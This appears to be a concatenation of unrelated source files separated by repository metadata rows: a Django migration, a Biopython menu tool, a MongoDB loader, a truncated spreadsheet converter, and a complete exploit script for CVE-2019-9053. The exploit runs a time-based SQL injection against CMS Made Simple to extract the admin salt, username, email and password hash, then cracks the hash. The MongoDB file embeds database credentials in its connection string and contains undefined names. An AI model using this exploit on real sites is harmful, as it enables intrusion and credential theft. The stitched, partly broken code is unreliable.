('private_parking', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Private Parking')),
('airport_transfer', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Airport Transfer')),
('available_hunting_types', jagdreisencheck.custom_fields.ListField(verbose_name='Hunting Types')),
('rifle_rentals', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Rifle Rentals')),
('hunting_start_time', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=5, verbose_name='Start of Season')),
('hunting_end_time', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=10, verbose_name='End of Season')),
('family_offers', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Family Offers')),
('alternative_activities', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Alternative Offers')),
('available_meal_options', jagdreisencheck.custom_fields.ListField(blank=True, null=True, verbose_name='Catering Options')),
('staff_languages', jagdreisencheck.custom_fields.ListField(verbose_name='Staff Languages')),
('interpreter_at_site', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Interpreting Service')),
('wireless_coverage', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Wireless Coverage')),
('broadband_internet', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Broadband Internet')),
('vendor_link', models.URLField(blank=True, null=True, verbose_name='Vendor Link')),
('description', ckeditor.fields.RichTextField(blank=True, max_length=8000, null=True, verbose_name='Trip Description')),
('featured', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Featured')),
('featured_start_date', models.DateTimeField(auto_now=True, null=True, verbose_name='Featuring Start')),
('featured_end_date', models.DateTimeField(blank=True, null=True, verbose_name='Featuring End')),
('sponsored', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Sponsored')),
('sponsored_start_date', models.DateTimeField(auto_now=True, null=True, verbose_name='Sponsoring Start')),
('sponsored_end_date', models.DateTimeField(blank=True, null=True, verbose_name='Sponsoring End')),
('reviewed', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Reviewed')),
('overall_rating', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Overall Rating')),
('rating_economic', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Economic Rating')),
('rating_ecologic', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Ecologic Rating')),
('rating_sociocultural', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Socio-Cultural Rating')),
('slogan', models.CharField(blank=True, max_length=75, null=True, verbose_name='Slogan')),
('pub_date', models.DateTimeField(auto_now=True, verbose_name='Publication Date')),
('last_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last Modified')),
('views', models.IntegerField(default=0, verbose_name='Views')),
('tech_name', models.CharField(max_length=30, null=True, verbose_name='Technical Name')),
('slug', models.SlugField(null=True, verbose_name='Absolute URL')),
('headline_image', models.ImageField(blank=True, null=True, upload_to='trips/headline_images/', verbose_name='Title Image')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.CompanyName', verbose_name='Company')),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='creator', to=settings.AUTH_USER_MODEL, verbose_name='Creator')),
('game', models.ManyToManyField(to='travelling.Game', verbose_name='Game')),
('reviewed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='reviewer', to=settings.AUTH_USER_MODEL, verbose_name='Reviewed By')),
],
options={
'verbose_name': 'Trip',
'verbose_name_plural': 'Trips',
},
),
migrations.CreateModel(
name='TripBestOfModel',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripbestofmodel', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
('num_objects', models.IntegerField(default=10, verbose_name='Number of Entries')),
('set_featured', models.BooleanField(default=False, verbose_name='Show Featured Only')),
('set_sponsored', models.BooleanField(default=False, verbose_name='Show Sponsored Only')),
('template', models.CharField(choices=[('travelling/components/trip-thumbnail.html', 'Standard Template')], default='travelling/components/trip-thumbnail.html', max_length=300, verbose_name='Template')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='TripCarouselConfig',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripcarouselconfig', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
('application', models.CharField(max_length=75, verbose_name='Application')),
('model', models.CharField(max_length=75, verbose_name='Database Model')),
('num_objects', models.IntegerField(default=10, verbose_name='Number of Entries')),
('set_featured', models.BooleanField(default=False, verbose_name='Show Featured Only')),
('set_sponsored', models.BooleanField(default=False, verbose_name='Show Sponsored Only')),
('selection_criteria', models.CharField(blank=True, max_length=450, null=True, verbose_name='Selection Criteria')),
('template', models.CharField(choices=[('travelling/components/trip-thumbnail.html', 'Default Template')], max_length=300, verbose_name='Template')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='TripCatalogueModel',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripcataloguemodel', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='Trophy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weight', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='Weight (kg)')),
('length', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='Length (cm)')),
('cic_pt', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='CIC Points')),
('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Game', verbose_name='Game')),
('rating', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='trophy_rating', to='travelling.Rating', verbose_name='Associated Rating')),
('trip', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Assiciated Trip')),
],
),
migrations.CreateModel(
name='AccommodationPriceList',
fields=[
('pricelist_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='travelling.PriceList')),
('name', models.CharField(max_length=75, verbose_name='Price list name')),
],
bases=('travelling.pricelist',),
),
migrations.CreateModel(
name='GamePriceList',
fields=[
('pricelist_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='travelling.PriceList')),
('name', models.CharField(max_length=75, verbose_name='Price list name')),
],
bases=('travelling.pricelist',),
),
migrations.AddField(
model_name='travelinquiry',
name='trip',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Trip'),
),
migrations.AddField(
model_name='travelinquiry',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.IndividualProfile', verbose_name='User'),
),
migrations.AddField(
model_name='rating',
name='trip',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Assiciated Trip'),
),
migrations.AddField(
model_name='rating',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='pricelist',
name='last_modified_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='pricelist',
name='trip',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Associated Trip'),
),
migrations.AddField(
model_name='pricelist',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='inital_creator', to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='gameprice',
name='price_list',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.PriceList', verbose_name='Associated Price List'),
),
migrations.AddField(
model_name='accommodationprice',
name='price_list',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.PriceList', verbose_name='Associated Price List'),
),
migrations.AlterUniqueTogether(
name='trip',
unique_together=set([('company', 'country', 'region')]),
),
migrations.AlterUniqueTogether(
name='rating',
unique_together=set([('user', 'trip')]),
),
]
| 83.473333
| 349
| 0.633376
| 24,682
| 0.985624
| 0
| 0
| 0
| 0
| 0
| 0
| 7,449
| 0.29746
|
49ce339e404139f63103f0e97e83fc72d1aded23
| 15,097
|
py
|
Python
|
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
from Bio.SeqIO import parse
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC, generic_dna
from Bio import Alphabet, Entrez
from Bio.SeqUtils import GC
from Bio.Blast import NCBIWWW, NCBIXML
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from Bio import motifs
__author__ = 'Maciej Michalczyk'
__version__ = '09122019'
class CurrentSession:
def __init__(self, sequence = None, comp_seq = None, transcribed_seq = None,
translated_seq = None, id = None, name = None, desc = None, gc_perc = None,
record = None):
self.sequence = None
self.comp_seq = None
self.transcribed_seq = None
self.translated_seq = None
self.id = None
self.name = None
self.desc = None
self.gc_perc = None
self.record = SeqRecord(self.sequence, id = self.id)
self.file_session = None
def openFile(self, filename):
file = open(filename + '.fasta')
self.file_session = str(filename + '.fasta')
return file
def closeFile(self, file_handle):
file_handle.close()
def getSequenceInfo(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.id = record.id
self.name = record.name
self.desc = record.description
self.sequence = Seq(str(record.seq), IUPAC.ambiguous_dna)
print("ID: {}".format(self.id))
print("Name: {}".format(self.name))
print("Description: {}".format(self.desc))
print("Sequence: {}".format(self.sequence))
# print("Complementary sequence: {}".format(sequence.complement()))
print("------------------------------------------------------------")
return
def getComplementarySequence(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.comp_seq = self.sequence.complement()
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("Complementary sequence: {}".format(self.comp_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, can't get a complementary of that. Load correct sequence.")
return
def transcribeSequence(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.transcribed_seq = self.sequence.transcribe()
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("Transcribed sequence: {}".format(self.transcribed_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, can't get a complementary of that. Load correct sequence.")
def translateSequence(self, file_handle, stop):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_rna)
self.name = record.name
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True and stop == 'y':
self.translated_seq = self.sequence.translate(to_stop=True)
print("Sequence: {}".format(self.sequence))
print("Translated sequence: {}".format(self.translated_seq))
print("------------------------------------------------------------")
elif Alphabet._verify_alphabet(self.sequence) == True and stop == 'n':
self.translated_seq = self.sequence.translate()
print("Sequence: {}".format(self.sequence))
print("Translated sequence: {}".format(self.translated_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a RNA, can't translate that. Load correct sequence.")
def get_GC_Content(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.gc_perc = GC(self.sequence)
print("Name {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("GC content: {}%".format(self.gc_perc))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, only calculate GC content in DNA. Load correct sequence.")
def fetchRecord(self, db, accession):
Entrez.email = "A.N.Other@example.com"
handle = Entrez.efetch(db = db, id = accession, rettype = "fasta")
#print(handle.read())
record = SeqIO.read(handle, "fasta")
print(record)
filename = record.name
file = open(filename + ".fasta", "w")
SeqIO.write(record, file, "fasta")
return filename
def runBlast(self, type, database):
seq_record = next(SeqIO.parse(open(self.file_session), 'fasta'))
print("Requesting BLAST (might take a few minutes...)")
request_handle = NCBIWWW.qblast(type, database, seq_record.seq)
print("BLAST succeeded.")
with open("{}_blast.xml".format(self.file_session), "w") as save_f:
save_f.write(request_handle.read())
request_handle.close()
print("BLAST results saved.")
def alignPairwise(self, file_handle, alignment_type):
try:
records = parse(file_handle, "fasta")
number = 1
seq1 = None
seq2 = None
for record in records:
if number == 1:
seq1 = record.seq
elif number == 2:
seq2 = record.seq
number += 1
if seq2 is None:
print("Error: There is only one sequence in the file.")
return
if alignment_type == str(1):
alignments = pairwise2.align.globalxx(seq1, seq2)
elif alignment_type == str(2):
alignments = pairwise2.align.localxx(seq1, seq2)
elif alignment_type == str(3):
match = int(input("Define points given for match: "))
mismatch = int(input("Define points deduced for mismatch: "))
o_gap = int(input("Define penalty for gap opening: "))
ext_gap = int(input("Define penalty for gap extension: "))
alignments = pairwise2.align.globalms(seq1, seq2, match, mismatch,
o_gap, ext_gap)
for alignment in alignments:
print("RAW ALIGNMENT: ")
print(alignment)
print("FORMATTED ALIGNMENT: ")
print(format_alignment(*alignment))
except Exception as e1:
print("Error, problably there is only one sequence.")
def createMotif(self, file_handle):
records = parse(file_handle, "fasta")
logofile = self.file_session + "_logo.png"
seqs_motif = []
for record in records:
self.sequence = Seq(str(record.seq))
seqs_motif.append(self.sequence)
seqs = motifs.create(seqs_motif)
print(seqs.counts)
seqs.weblogo(logofile)
print("Weblogo saved.")
def getElems(self, length):
for base in range(len(self.sequence)):
if base + length > len(self.sequence):
break
else:
yield self.sequence[base:base + length]
def saveActions(self):
if self.file_session != None:
with open("{}_actions.txt".format(self.id), "w") as save_f:
save_f.write("""ID: {}
NAME: {}
DESCRIPTION: {}
ORIGINAL SEQUENCE: {}
COMPLEMENTARY SEQUENCE: {}
TRANSCRIBED SEQUENCE: {}
TRANSLATED SEQUENCE: {}
G/C PERCENTAGE: {}%""".format(self.id, self.name, self.desc, self.sequence, self.comp_seq,
self.transcribed_seq, self.translated_seq, self.gc_perc))
save_f.close()
print("Your actions were saved!")
else:
print("Nothing to save, probably you haven't loaded any file before.")
# def convertFASTAtoGENBANK(self, filename):
# file = open(filename + ".fasta")
# record = SeqIO.read(file, "fasta")
# record.seq.alphabet = generic_dna
# file_genbank = open(filename + ".gbk", "w")
# SeqIO.write(record, file_genbank, "genbank")
# file_genbank.close()
# file.close()
if __name__ == '__main__':
session = CurrentSession()
while True:
print("""////Bio Python////
1. Load FASTA file
2. Load record info
3. Get complementary sequence
4. Transcribe sequence
5. Translate sequence
6. Get GC content
7. Fetch and load FASTA from Entrez
*8. Convert FASTA to GenBank
9. Run BLAST
10. Perform pairwise aligment
11. Create motifs and weblogo
12. Save your actions made on FASTA file to txt file
13. Print sequence substrings
=== Current session file: {} ===
Type 'help' for help.
Type 'quit' to exit.""".format(session.file_session))
menu_pos = input('>>').lower()
if menu_pos == str(1):
try:
print("Type name of FASTA file to process: ")
filename = input()
file_handle = session.openFile(filename)
print("FASTA loaded!")
except Exception as e:
print("No such file or directory.")
elif menu_pos == str(2):
try:
file_handle = session.openFile(filename)
session.getSequenceInfo(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(3):
try:
file_handle = session.openFile(filename)
session.getComplementarySequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(4):
try:
file_handle = session.openFile(filename)
session.transcribeSequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(5):
stop = input('Stop translating at first stop codon? [y/n]').lower()
try:
file_handle = session.openFile(filename)
session.translateSequence(file_handle, stop)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(6):
try:
file_handle = session.openFile(filename)
session.get_GC_Content(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(7):
try:
db = input("Type database name: ").lower()
accession = input("Type accession to find: ")
filename = session.fetchRecord(db, accession)
file_handle = session.openFile(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(8):
try:
print("Type name of FASTA file to process: ")
filename = input()
# session.convertFASTAtoGENBANK(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(9):
try:
file_handle = session.openFile(filename)
type = input("Type the type of BLAST: ")
database = input("Type database name: ")
session.runBlast(type, database)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(10):
try:
print("""Choose type of aligment:
1. Global Pairwise (default parameters)
2. Local Pairwise (default parameters)
3. Global Pairwise with custom parameters""")
alignment_type = input('>>')
file_handle = session.openFile(filename)
session.alignPairwise(file_handle, alignment_type)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(11):
try:
file_handle = session.openFile(filename)
session.createMotif(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded")
elif menu_pos == str(12):
session.saveActions()
elif menu_pos == str(13):
try:
length = int(input("Length of substrings:"))
iterator = session.getElems(length)
print(session.sequence)
i = 0
for base in iterator:
print(' ' * i + base)
i += 1
print(' ' * i + next(iterator))
i += 1
except StopIteration:
pass
except Exception as e:
print("File is not loaded")
elif menu_pos == 'debug':
print("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(session.id, session.name,
session.desc,session.sequence,
session.comp_seq, session.transcribed_seq,
session.translated_seq, session.gc_perc))
elif menu_pos == 'quit':
break
elif menu_pos == 'help':
print("""
quickHELP:
Indent operations in menu needs file to be opened first.
Be patient while doing BLAST.
If in menu something is marked with an asterisk, then it is not usable.
Have fun!
""")
else:
print("Unknown command.")
| 39.111399
| 110
| 0.540703
| 8,601
| 0.569716
| 221
| 0.014639
| 0
| 0
| 0
| 0
| 3,739
| 0.247665
|
49cfbdd139a2858864f15766804aa976f1344306
| 6,456
|
py
|
Python
|
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | null | null | null |
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | null | null | null |
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | 1
|
2022-03-11T22:55:33.000Z
|
2022-03-11T22:55:33.000Z
|
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print "[+] Specify an url target"
print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str(salt) + line).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print colored("[*] Now try to crack password")
crack_password()
beautify_print()
| 34.709677
| 189
| 0.586431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,721
| 0.266574
|
49d510eb8a62e95ceab2defdd45b0de37d252639
| 968
|
py
|
Python
|
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
import pymongo
client = pymongo.MongoClient('''mongodb://dakotapope:passwrd@
cluster0-shard-00-00-iaoct.mongodb.net:27017,cluster0-shard-00
-01-iaoct.mongodb.net:27017,cluster0-shard-00-02-iaoct.mongodb.
net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=
admin&retryWrites=true''')
# investigate the databases already initialized
client.database_names()
# -->['rpg_data', 'test', 'admin', 'local']
# since I created the table on the Mongo Atlas dashboard I wil use it here
rpgs = client.rpg_data.rpg
# loadout the json file to prep for dumping into a mongo db table
with open('''C:/Users/dakot/Documents/GitHub/DS-Unit-3-Sprint-2-SQL-and-
Databases/module3-nosql-and-document-oriented-databases/rpg.json''') as f:
file_data = json.load(f)
# make a space for the data to go
rpg_table = rpg['rpg_data']
# Dump the json data into the mongodb cloud.
rpg_table.insert_many(file_data)
# <pymongo.results.InsertManyResult at 0x2c80a7c8688>
# And DONE!
| 34.571429
| 74
| 0.764463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 759
| 0.784091
|
49d5165d59fc22ca8bcab148e06413fa005d535e
| 2,799
|
py
|
Python
|
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import xlrd
import csv
import sys
import getopt
# input configuration
iColDate = 0
iColTransactionType = 1
iColAmount = 3
iColDescription = 6
transactionType = 'Repayment'
descriptionType = 'Interest'
#output configuration
outHeader = ['Datum', 'Typ', 'Wert']
outType = 'Zinsen'
outDelimiter = ';'
def localize_floats(row):
return [
str(el).replace('.', ',') if isinstance(el, float) else el
for el in row
]
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print('convertPP.py -i <inputfile> -o <outputfile>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('convertPP.py -i <inputfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
inWorkbook = xlrd.open_workbook(inputfile)
inWorksheet = inWorkbook.sheet_by_index(0)
#alternatively by workheet name inWorksheet = inWorkbook.sheet_by_name('Worksheet')
interests = []
concatInterests = []
iRow = 0
while iRow < inWorksheet.nrows:
if inWorksheet.cell(iRow, iColTransactionType).value == transactionType:
if inWorksheet.cell(iRow, iColDescription).value == descriptionType:
#print('p0: ', inWorksheet.cell(iRow,iColDate).value, inWorksheet.cell(iRow,iColTransactionType).value, inWorksheet.cell(iRow,iColAmount).value, inWorksheet.cell(iRow,iColDescription).value)
lastDate = inWorksheet.cell(iRow,iColDate).value
interest = inWorksheet.cell(iRow,iColAmount).value
#print('p1: ', lastDate, interest, iRow)
interests.append([lastDate, interest])
iRow += 1
#print('px: ', interests)
#print(interests[0][0], interests[1][0])
iRow = 0
while iRow < len(interests):
lastDate = interests[iRow][0]
interest = interests[iRow][1]
#print('p3: ', lastDate, iRow, len(interests))
if iRow < len(interests) - 1 and interests[iRow + 1][0] == lastDate:
while interests[iRow + 1][0] == lastDate:
#print('p4: ', interests[iRow + 1][0], lastDate)
iRow += 1
interest += interests[iRow][1]
#print('p5: ', iRow, interest)
if iRow >= len(interests) - 1:
break
concatInterests.append([lastDate, outType, interest])
else:
concatInterests.append([lastDate, outType, interest])
iRow += 1
if iRow > len(interests) - 1:
break
with open(outputfile, 'w', newline='') as outFile:
csv_writer = csv.writer(outFile, delimiter=outDelimiter)
csv_writer.writerow(outHeader)
for row in concatInterests:
